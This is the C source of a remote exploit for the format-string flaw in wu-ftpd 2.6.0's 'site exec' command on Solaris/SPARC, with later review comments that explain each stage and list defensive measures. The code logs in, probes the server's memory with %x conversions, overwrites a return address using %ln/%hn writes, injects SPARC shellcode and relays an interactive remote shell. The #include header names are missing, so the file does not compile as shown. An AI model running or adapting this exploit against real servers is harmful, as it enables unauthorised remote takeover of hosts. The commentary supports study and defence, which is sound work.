/*
 * BETA1 - wuftpd 2.6.0 remote for solaris/sparc
 *
 * SunOS 5.7 Generic_106541-06 sun4u sparc SUNW,Ultra-5_10
 * [ Using values: offset=ffbeda1c eat=8 align=89 add=ffbedff0 inicio=a1 ]
 * [ Using values: offset=ffbeda8c eat=8 align=89 add=ffbee8d0 inicio=a1 ]
 *
 * The Dark Raver
 */

/*
 * NOTE(review): this listing exercises the format-string flaw in the
 * "site exec" handling of wu-ftpd 2.6.0 as described in the header: the
 * command text built below is made of "%x", width-padded conversions and
 * "%ln"/"%hn" directives, i.e. it relies on the server passing the user
 * supplied argument to a printf-family function as the format string.
 * Defensive takeaways that follow from what the code does: run a patched
 * wu-ftpd release or another FTP daemon; do not offer anonymous login
 * (the code logs in as "upload"/"upload") where it is not required; and
 * alert on SITE EXEC arguments containing '%' conversion specifiers,
 * in particular %n, %hn and %ln.
 *
 * The page this was taken from had its line breaks collapsed. The layout
 * below is a best-effort restoration; the header names after the
 * #include directives were lost in extraction and are NOT reconstructed
 * here, so this file does not compile as shown.
 */
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

int debug=0; // change this if you want output
int force=1;  // 1 = probe each value against the server; -f sets 0 = use given/default values

#define LEN1 120
#define EAT 8
#define TOEIP 0xffbeda1c
#define ALIN 89
#define RETN 0xffbedb50
#define BUFLEN 1024
#define BIGBUF 10000
#define INICIO 0x65

void conectar(char *host);
void term(void);
void mkcode1(void);
void mkbuf(void);
void mkini(void);
void mkalin(void);
void mksh(void);
void status(void);

char code1[LEN1]; // nops + suid + sh
char code2[]= "";
/* 0xa6 filler followed by the payload bytes; stage 5 in main() looks for
 * the leading 0xa6 run in the server's reply to locate this data. */
char code3[]=
"\xa6\xa6\xa6\xa6\xa6\xa6\xa6\xa6\xa6\xa6\xa6\xa6\xa6\xa6\xa6\xa6"
"\xa6\xa6\xa6\xa6\xa6\xa6\xa6\xa6\xa6\xa6\xa6\xa6\xa6\xa6\xa6\xa6"
"\xa6\xa6\xa6\xa6\xa6\xa6\xa6\xa6\xa6\xa6\xa6\xa6\xa6\xa6\xa6\xa6"
"\xa6\xa6\xa6\xa6\xa6\xa6\xa6\xa6\xa6\xa6\xa6\xa6\xa6\xa6\xa6\xa6"
"\xa6\xa6\xa6\xa6\xa6\xa6\xa6\xa6\xa6\xa6\xa6\xa6\xa6\xa6\xa6\xa6"
"\xa6\xa6\xa6\xa6\xa6\xa6\xa6\xa6\xa6\xa6\xa6\xa6\xa6\xa6\xa6\xa6"
"\xa6\xa6\xa6\xa6\xa6\xa6\xa6\xa6\xa6\xa6\xa6\xa6\xa6\xa6\xa6\xa6"
"\x82\x10\x20\x17\x90\x20\x60\x17\x92\x22\x40\x09\x91\xd0\x20\x08"
"\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2b\x0b\xda\xdc\xae\x15\x63\x68"
"\x90\x0b\x80\x0e\x92\x03\xa0\x0c\x94\x10\x20\x10\x94\x22\xa0\x10"
"\x9c\x03\xa0\x14\xec\x3b\xbf\xec\xc0\x23\xbf\xf4\xdc\x23\xbf\xf8"
"\xc0\x23\xbf\xfc\x82\x10\x20\x3b\x91\xd0\x20\x08\x90\x1b\xc0\x0f"
"\x82\x10\x20\x01\x91\xd0\x20\x08"
;

// Global variables rulez!!! ;)
// All state shared between main() and the helpers lives here; nothing
// below is reentrant or thread-safe.
int alin=ALIN;            // index in code1 where mkcode1() starts writing toeip
int eat=EAT;              // number of "%x" conversions emitted by the mk* helpers
unsigned int toeip=TOEIP; // value written into code1 by mkcode1()
unsigned int retn=RETN;   // value split into two 16-bit halves by mkbuf()
char buf[BUFLEN];         // command buffer filled by mkbuf/mkini/mkalin/mksh
int inicio=INICIO;        // reply offset measured in stage 4 of main()
int opt=1;                // loop flag: cleared when a probe reply matches
int sock;                 // control connection opened by conectar()
struct sockaddr_in sa;
struct hostent *hp;

/*
 * Entry point.
 * Usage after getopt: host [offset] [eat] [align] [address]; "-d" pauses
 * for a keypress between stages and echoes server replies, "-f" skips the
 * probing loops and uses the given or default values.
 * Stages 2-5 send a "site exec" command, read the reply into mbuf and
 * look for a '|' marker; the bytes after it decide whether the current
 * value is kept. Stage 6 sends the buffer built by mkbuf() and hands the
 * connection to term(); the surrounding do/while never clears opt, so it
 * only ends when exit() is called from a helper or the user interrupts.
 * Code-quality notes: the byte count c returned by recv() is never
 * checked, so mbuf is used as a C string without being guaranteed a
 * terminator, and str[9]/str[5] are written without checking that the
 * reply is that long after the marker.
 */
int main(int argc, char *argv[])
{
    char mbuf[BIGBUF];
    int c;
    char *str;

    while((c = getopt(argc,argv,"df"))!= -1){
        switch (c) {
        case 'd':
            printf("Debug active\n");
            debug=1;
            break;
        case 'f':
            printf("Forcing values\n");
            force=0;
            break;
        }
    }
    argc-=optind;
    argv+=optind;
    //printf("%i\n", argc);
    if(argc==1) {
        printf("Using default values: offset=%x eat=%i align=%i add=%x\n", toeip, eat, alin, retn);
    } else {
        if(argc!=5) {
            fprintf(stderr,"Usage: fx [offset] [eat] [align] [address] [-d] [-f]\n");
            exit(0);
        }
    }
    printf("1. Connecting...\n");
    if(debug) getchar();
    conectar(argv[0]);
    printf("2. Calculating eat...\n");
    if(debug) getchar();
    if(argc>=3) {
        sscanf(argv[2], "%i", &eat);
    } else {
        eat=EAT;
    }
    // The real spaghetti coding!!! ;)
    // Stage 2: code1 is all '0' (0x30); eat is raised until the reply
    // after '|' echoes "30303030", i.e. the conversions reach code1.
    if(force) {
        eat--;
        do {
            eat++;
            memset(code1,0x30,LEN1);
            mkalin();
            send(sock,buf,strlen(buf),0);
            c=recv(sock, mbuf, sizeof(mbuf), 0);
            if(debug) puts(mbuf);
            str=strchr(mbuf,'|');
            if(str==0) {
                printf("Unable to complete search!\n");
                exit(-1);
            }
            str[9]='\x00';
            printf("Using eat: %i\n", eat);
            printf("<%s>\n\n",str);
            if(!(strncmp(str,"|30303030",9))) {
                opt=0;
            }
            memset(mbuf, 0, BIGBUF);
            c=recv(sock, mbuf, sizeof(mbuf), 0);  // second read drains the rest of the reply
            if(debug) puts(mbuf);
            memset(mbuf, 0, BIGBUF);
            if(debug) getchar();
        } while(opt);
        opt=1;
    }
    printf("Eat OK: %i\n", eat);
    printf("3. Calculating align...\n");
    if(debug) getchar();
    if(argc>=4) {
        sscanf(argv[3], "%i", &alin);
    } else {
        alin=ALIN;
    }
    // Stage 3: same probe with toeip set to the marker 0x31313131 ("1111");
    // alin is raised until the echoed bytes line up on that marker.
    if(force) {
        alin--;
        do {
            alin++;
            toeip=0x31313131;
            mkcode1();
            mkalin();
            send(sock,buf,strlen(buf),0);
            c=recv(sock, mbuf, sizeof(mbuf), 0);
            if(debug) puts(mbuf);
            str=strchr(mbuf,'|');
            if(str==0) {
                printf("Unable to complete search!\n");
                exit(-1);
            }
            str[9]='\x00';
            printf("Using align: %i\n", alin);
            printf("<%s>\n\n",str);
            if(!(strncmp(str,"|31313131",9))) {
                opt=0;
            }
            memset(mbuf, 0, BIGBUF);
            c=recv(sock, mbuf, sizeof(mbuf), 0);
            if(debug) puts(mbuf);
            memset(mbuf, 0, BIGBUF);
            if(debug) getchar();
        } while(opt);
        opt=1;
        toeip=TOEIP;  // restore after the marker probe
    }
    printf("Align OK: %i\n", alin);
    printf("4. Calculating inital length...\n");
    if(debug) getchar();
    if(argc>=2) {
        sscanf(argv[1], "%x", &toeip);
    } else {
        toeip=TOEIP;
    }
    // Stage 4: one probe; inicio is the position of '|' in the reply
    // minus 4 (presumably the length of the reply-code prefix "200 ";
    // not verified here).
    if(force) {
        mkcode1();
        mkini();
        send(sock,buf,strlen(buf),0);
        c=recv(sock, mbuf, sizeof(mbuf), 0);
        if(debug) puts(mbuf);
        str=strchr(mbuf,'|');
        if(str==0) {
            printf("Unable to complete search!\n");
            exit(-1);
        }
        inicio=str - mbuf - 4;
        memset(mbuf, 0, BIGBUF);
        c=recv(sock, mbuf, sizeof(mbuf), 0);
        if(debug) puts(mbuf);
        memset(mbuf, 0, BIGBUF);
        if(debug) getchar();
    }
    printf("Start OK: %x\n", inicio);
    // It search in the remote memory!! wow!! :)
    // Stage 5: retn is stepped by 0x40 until the "%s" in mksh()'s command
    // echoes the 0xa6 filler from code3 back after the '|' marker.
    printf("5. Searching for shellcode\n");
    if(debug) getchar();
    if(argc>=5) {
        sscanf(argv[4], "%x", &retn);
    } else {
        retn=RETN;
    }
    if(force) {
        retn-=0x40;
        do {
            retn+=0x40;
            toeip=retn;
            mkcode1();
            mksh();
            if(debug) puts(buf);
            send(sock,buf,strlen(buf),0);
            c=recv(sock, mbuf, sizeof(mbuf), 0);
            if(debug) puts(mbuf);
            str=strchr(mbuf,'|');
            if(str==0) {
                printf("Unable to complete search!\n");
                exit(-1);
            }
            str[5]='\x00';
            printf("Using ret: %x\n", retn);
            printf("<%s>\n\n",str);
            if(!(strncmp(str,"|\xa6\xa6\xa6\xa6",5))) {
                opt=0;
            }
            memset(mbuf, 0, BIGBUF);
            c=recv(sock, mbuf, sizeof(mbuf), 0);
            if(debug) puts(mbuf);
            memset(mbuf, 0, BIGBUF);
            if(debug) getchar();
        } while(opt);
        opt=1;
    }
    retn=retn+0x460;  // fixed adjustment past the filler; value not derived here
    printf("Address of the shellcode OK: %x\n", retn);
    printf("6. Sending attack...\n");
    if(argc>=2) {
        sscanf(argv[1], "%x", &toeip);
    } else {
        toeip=TOEIP;
    }
    status();
    if(debug) getchar();
    // Stage 6: toeip is advanced by 4 and the connection re-opened after
    // each attempt; opt stays 1, so this loop has no normal exit.
    do {
        printf("Using Offset: %x\n", toeip);
        mkcode1();
        mkbuf();
        send(sock,buf,strlen(buf),0);
        printf("Waiting for shell...\n\n");
        term();
        printf("Logged out...\n");
        toeip+=4;
        if(debug) getchar();
        printf("Reconecting...\n");
        if(debug) getchar();
        close(sock);
        fflush(stdout);
        conectar(argv[0]);
    } while(opt);
    printf("Ending...");
    if(debug) getchar();
    close(sock);
    fflush(stdout);
    exit(0);
}

/*
 * Resolves host, connects to TCP port 21 and logs in with user/pass
 * "upload"/"upload", expecting "220", "331" and "230" replies (a "220-"
 * or "230-" multi-line greeting is drained with one extra recv()).
 * Exits the process on any failure; sets the globals sock, sa and hp.
 * Notes: h_length is copied into sa.sin_addr without a size check, the
 * recv() count c is never used, and the code2 argument passed to
 * printf()/sprintf() has no matching conversion and is ignored.
 */
void conectar(char *host)
{
    char cbuf[BUFLEN];
    int c;

    memset(cbuf, 0, BUFLEN);
    if((hp=(struct hostent *)gethostbyname(host))==NULL) {
        perror("gethostbyname()");
        exit(0);
    }
    if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0) {
        perror("socket()");
        exit(0);
    }
    sa.sin_family=AF_INET;
    sa.sin_port=htons(21);
    memcpy((char *)&sa.sin_addr,(char *)hp->h_addr,hp->h_length);
    if(connect(sock,(struct sockaddr *)&sa,sizeof(sa))!=0) {
        perror("connect()");
        exit(0);
    }
    printf("Connected to %s\n",host);
    printf("Reading...\n");
    c=recv(sock, cbuf, sizeof(cbuf), 0);
    if(debug) puts(cbuf);
    if((strncmp(cbuf, "220 ", 4))==0) {
        memset(cbuf, 0, BUFLEN);
    } else {
        if((strncmp(cbuf, "220-", 4))==0) {
            memset(cbuf, 0, BUFLEN);
            c=recv(sock, cbuf, sizeof(cbuf), 0);
            if(debug) puts(cbuf);
            memset(cbuf, 0, BUFLEN);
        } else {
            printf("Wrong ftp server\n");
            exit(-1);
        }
    }
    printf(">> user upload\n");
    sprintf(cbuf,"user upload\n");
    write(sock,cbuf,strlen(cbuf));
    c=recv(sock, cbuf, sizeof(cbuf), 0);
    if(debug) puts(cbuf);
    if(strncmp(cbuf, "331", 3)) {
        printf("Anonymous ftp not allowed\n");
        exit(-1);
    }
    memset(cbuf, 0, BUFLEN);
    printf(">> pass upload\n", code2);
    sprintf(cbuf,"pass upload\n", code2);
    write(sock,cbuf,strlen(cbuf));
    c=recv(sock, cbuf, sizeof(cbuf), 0);
    if(debug) puts(cbuf);
    if((strncmp(cbuf, "230 ", 4))==0) {
        memset(cbuf, 0, BUFLEN);
    } else {
        if((strncmp(cbuf, "230-", 4))==0) {
            memset(cbuf, 0, BUFLEN);
            c=recv(sock, cbuf, sizeof(cbuf), 0);
            if(debug) puts(cbuf);
            memset(cbuf, 0, BUFLEN);
        } else {
            printf("Wrong password\n");
            exit(-1);
        }
    }
    printf("Logged\n");
    /*printf(">> %s\n", code2);
    sprintf(cbuf,"%s\n", code2);
    write(sock,cbuf,strlen(cbuf));
    c=recv(sock, cbuf, sizeof(cbuf), 0);
    if(debug) puts(cbuf);*/
}

/*
 * Interactive relay between the terminal and sock using select().
 * Sends "QUIT\nuname -a; id;\n" first, then copies socket data to the
 * terminal and terminal input to the socket until either side hits EOF
 * or select() fails. Note: socket output is written to fd 0 (stdin),
 * which only works because it is the same terminal as stdout; fd 1 was
 * presumably intended.
 */
void term(void)
{
    char sbuf[BUFLEN];
    fd_set rfds;
    int x;

    printf("Overwrited...\n");
    if(debug) getchar();
    sprintf(sbuf, "QUIT\nuname -a; id;\n");
    send(sock, sbuf, strlen(sbuf), 0);
    while (1) {
        FD_ZERO(&rfds);
        FD_SET(0, &rfds);
        FD_SET(sock, &rfds);
        if(select((0 > sock ? 0 : sock) + 1, &rfds, NULL, NULL, NULL) < 1) return;
        if(FD_ISSET(sock, &rfds)) {
            if((x = read(sock, sbuf, sizeof(sbuf))) < 1) return;
            write(0, sbuf, x);
        }
        if(FD_ISSET(0, &rfds)) {
            if((x = read(0, sbuf, sizeof(sbuf))) < 1) return;
            write(sock, sbuf, x);
        }
    }
}

/*
 * Fills code1 with '0' (0x30), then starting at index alin writes the
 * four bytes of toeip, most significant first, twice in a row with one
 * skipped byte between the copies (i=i+5 after four increments). Any byte
 * equal to 0xff is written twice (presumably so it survives the control
 * channel's telnet-style handling of 0xff; not verified here). The
 * buffer is then NUL-terminated four positions back from the final index.
 * No bounds check against LEN1: alin plus up to 17 bytes must fit.
 */
void mkcode1(void)
{
    int i;
    int c;

    memset(code1,0x30,LEN1);
    i=alin;
    for(c=0;c<2;c++) {
        code1[i]=((toeip & 0xff000000) >> 24);
        if(code1[i]=='\xff') {
            i++;
            code1[i]=((toeip & 0xff000000) >> 24);
        }
        i++;
        code1[i]=((toeip & 0xff0000) >> 16);
        if(code1[i]=='\xff') {
            i++;
            code1[i]=((toeip & 0xff0000) >> 16);
        }
        i++;
        code1[i]=((toeip & 0xff00) >> 8);
        if(code1[i]=='\xff') {
            i++;
            code1[i]=((toeip & 0xff00) >> 8);
        }
        i++;
        code1[i]=(toeip & 0xff);
        if(code1[i]=='\xff') {
            i++;
            code1[i]=(toeip & 0xff);
        }
        i=i+5;
    }
    i=i-4;
    code1[i]='\x00';
}

/*
 * Builds the stage-6 command into buf: "site exec ", the LEN1 bytes of
 * code1 (copied with "%c", so a NUL in code1 ends the copy early),
 * eat-1 "%x" conversions, a width-padded conversion whose width is the
 * low half of retn minus inicio, "%ln", a second padded conversion for
 * the high half of retn, "%hn", then code3 and a newline.
 * Every write is an unbounded sprintf() into the 1024-byte buf; with
 * LEN1=120 and the 200-byte code3 the result stays well under that, but
 * nothing enforces it. r3 and r4 are unused.
 */
void mkbuf(void)
{
    char *ptr = buf;
    int r1, r2, r3, r4;
    int i;

    memset(buf, 0, 1024);
    ptr = &buf[strlen(buf)];
    sprintf(ptr, "site exec ");
    ptr = &buf[strlen(buf)];
    for(i=0; i < LEN1;i++) {
        sprintf(ptr,"%c", code1[i]);
        ptr = &buf[strlen(buf)];
    }
    for(i=0; i < eat - 1; i++) {
        sprintf(ptr, "%%x");
        ptr = &buf[strlen(buf)];
    }
    r1 = (retn & 0x0000ffff);
    sprintf(ptr,"%%.%.5dx", r1 - inicio);  // "%.NNNNNx" with a 5-digit width
    ptr = &buf[strlen(buf)];
    //sprintf(ptr,"%%x");
    sprintf(ptr,"%%ln");
    ptr = &buf[strlen(buf)];
    r2 = ((retn & 0xffff0000) >> 16);
    sprintf(ptr,"%%.%.5dx", r2 - r1 + 8);
    ptr = &buf[strlen(buf)];
    //sprintf(ptr,"%%x");
    sprintf(ptr,"%%hn");
    ptr = &buf[strlen(buf)];
    sprintf(ptr,"%s",code3);
    ptr = &buf[strlen(buf)];
    sprintf(ptr,"\n");
}

/*
 * Builds the probe command used in stage 4: "site exec ", code1 (via
 * "%c", stopping at a NUL), eat "%x" conversions, the '|' marker, one
 * more "%x" and a newline. Same unbounded sprintf() pattern as mkbuf().
 * The body is identical to mkalin(); the two names only mark which
 * stage calls them.
 */
void mkini(void)
{
    char *ptr = buf;
    int i;

    memset(buf, 0, 1024);
    ptr = &buf[strlen(buf)];
    sprintf(ptr, "site exec ");
    ptr = &buf[strlen(buf)];
    for(i=0; i < LEN1;i++) {
        sprintf(ptr,"%c", code1[i]);
        ptr = &buf[strlen(buf)];
    }
    for(i=0; i < eat; i++) {
        sprintf(ptr, "%%x");
        ptr = &buf[strlen(buf)];
    }
    sprintf(ptr,"|");
    ptr = &buf[strlen(buf)];
    sprintf(ptr,"%%x");
    ptr = &buf[strlen(buf)];
    sprintf(ptr,"\n");
}

/*
 * Probe command for stages 2 and 3; byte-for-byte the same construction
 * as mkini(). Defined with an empty parameter list although the prototype
 * above says (void) - harmless in C but inconsistent.
 */
void mkalin()
{
    char *ptr = buf;
    int i;

    memset(buf, 0, 1024);
    ptr = &buf[strlen(buf)];
    sprintf(ptr, "site exec ");
    ptr = &buf[strlen(buf)];
    for(i=0; i < LEN1;i++) {
        sprintf(ptr,"%c", code1[i]);
        ptr = &buf[strlen(buf)];
    }
    for(i=0; i < eat; i++) {
        sprintf(ptr, "%%x");
        ptr = &buf[strlen(buf)];
    }
    sprintf(ptr,"|");
    ptr = &buf[strlen(buf)];
    sprintf(ptr,"%%x");
    ptr = &buf[strlen(buf)];
    sprintf(ptr,"\n");
}

/*
 * Probe command for stage 5: "site exec ", code1, eat-1 "%x"
 * conversions, a fixed-width "%.00008x", the marker "|%s -", then code3
 * and a newline. Stage 5 checks whether the reply after '|' starts with
 * the 0xa6 filler of code3. r1..r4 are unused; same unbounded sprintf()
 * pattern as the other mk* helpers.
 */
void mksh(void)
{
    char *ptr = buf;
    int r1, r2, r3, r4;
    int i;

    memset(buf, 0, 1024);
    ptr = &buf[strlen(buf)];
    sprintf(ptr, "site exec ");
    ptr = &buf[strlen(buf)];
    for(i=0; i < LEN1;i++) {
        sprintf(ptr,"%c", code1[i]);
        ptr = &buf[strlen(buf)];
    }
    for(i=0; i < eat - 1; i++) {
        sprintf(ptr, "%%x");
        ptr = &buf[strlen(buf)];
    }
    sprintf(ptr,"%%.%.5dx", 8);
    ptr = &buf[strlen(buf)];
    sprintf(ptr,"|%%s -");
    ptr = &buf[strlen(buf)];
    sprintf(ptr,"%s",code3);
    ptr = &buf[strlen(buf)];
    sprintf(ptr,"\n");
}

/* Prints the current values of the five tunable globals, in the same
 * "[ Using values: ... ]" form as the lines in the file header. */
void status(void){
    printf("[ Using values: offset=%x eat=%i align=%i add=%x inicio=%x ]\n", toeip, eat, alin, retn, inicio);
}
// By The Dark Raver